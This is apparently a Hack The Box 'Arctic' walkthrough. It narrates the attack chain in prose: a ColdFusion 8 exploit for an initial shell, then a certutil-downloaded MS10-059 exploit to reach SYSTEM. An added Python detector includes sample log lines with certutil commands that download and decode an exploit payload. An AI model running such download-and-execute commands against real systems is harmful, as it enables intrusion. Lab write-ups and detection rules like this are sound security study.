Arctic HTB

IP

10.10.10.11

Nmap

sudo nmap -sV -sC -A -oA nmap/results 10.10.10.11

We can see the following open ports:

135: RPC

8500: labelled FMTP (Flight Message Transfer Protocol) by nmap, an old service name; in practice this port serves a web page

49164: RPC

Browsing to port 8500 in a web browser brings up that web page.

As we manually navigate through the directories (a very slow web page, by the way), we come across something interesting.

From this we can tell the application runs:

  • ADOBE COLDFUSION 8

Trying basic credentials doesn't work, but when we catch a login request in Burp we find some interesting parameters.

Let's search for an exploit.

We can copy it down to our working directory.

We need to modify the script to set our host IP and port, and the target machine's IP.

Now we can run the exploit.

We then get a shell as tolis.

Privilege Escalation via tolis

Let's gather some information on the machine.

Nothing interesting with users and groups

What we can do is gather system information and run it through a tool such as wes-ng to see if we can find an exploit to elevate our privileges.

First let's clone wes-ng onto our local machine.

On the target machine, run systeminfo and collect its output.

Now we can just copy and paste the output into a file on our local machine called systeminfo.txt

To use wes-ng we first need to update its database in the directory we are working in.

Running wes against our systeminfo.txt:

From the output of wes we can determine that MS10-059 is missing on the target, so we can use it.

First we need to clone the following repo onto our local machine. Keep in mind this repo is quite large, so you can also fetch just the single MS10-059 exploit.

Let's cp MS10-059 into our working directory.

Let's start a Python3 server.

From the target machine we want to download the exploit; we can use certutil for this.

We should now have MS10-059 on the target machine.
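The certutil download step above is exactly the kind of activity a blue team on the target would want an alert for. The following is an added example (not part of the original writeup) that runs a small detection over constructed process-creation log lines; the host, user, IP and file names in the sample are made up, and the field layout is an assumed pipe-separated SIEM export.

```python
import re

# Constructed sample of process-creation events (not captured from the box).
# One event per line: timestamp|host|user|image|command line
SAMPLE_EVENTS = """\
2024-01-01T10:00:01|ARCTIC|ARCTIC\\tolis|C:\\Windows\\System32\\certutil.exe|certutil -urlcache -split -f http://10.0.0.5:8000/MS10-059.exe C:\\Users\\tolis\\MS10-059.exe
2024-01-01T10:00:05|ARCTIC|ARCTIC\\tolis|C:\\Windows\\System32\\certutil.exe|certutil -decode C:\\Users\\tolis\\payload.txt C:\\Users\\tolis\\payload.exe
2024-01-01T10:00:09|ARCTIC|NT AUTHORITY\\SYSTEM|C:\\Windows\\System32\\certutil.exe|certutil -verify -urlfetch C:\\certs\\server.cer
2024-01-01T10:00:12|ARCTIC|ARCTIC\\tolis|C:\\Windows\\System32\\cmd.exe|cmd /c whoami
"""

# Each rule is (name, predicate over the lower-cased command line).
RULES = [
    ("certutil fetching a remote URL to disk",
     lambda c: "-urlcache" in c and re.search(r"https?://", c) is not None),
    ("certutil decoding a file to disk",
     lambda c: "-decode" in c),
]


def parse_event(line):
    ts, host, user, image, cmdline = line.split("|", 4)
    return {"ts": ts, "host": host, "user": user, "image": image, "cmdline": cmdline}


def detect_certutil_abuse(text):
    """Return (timestamp, user, rule name) for each suspicious certutil event.

    Only certutil.exe processes are inspected. '-verify -urlfetch' also talks
    to the network, but it is the normal revocation-check usage and is left
    unflagged on purpose to keep the rule low-noise.
    """
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        if not ev["image"].lower().endswith("\\certutil.exe"):
            continue
        cmd = ev["cmdline"].lower()
        for name, pred in RULES:
            if pred(cmd):
                hits.append((ev["ts"], ev["user"], name))
    return hits


if __name__ == "__main__":
    for ts, user, rule in detect_certutil_abuse(SAMPLE_EVENTS):
        print(f"{ts} {user}: {rule}")
```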

On our local machine, let's start a Netcat listener wrapped in rlwrap.

  • What does rlwrap do? It provides readline's line editing, persistent history and completion, giving us a more complete and stable shell.

Now let's run our exploit.

We now have a shell as NT AUTHORITY\SYSTEM.
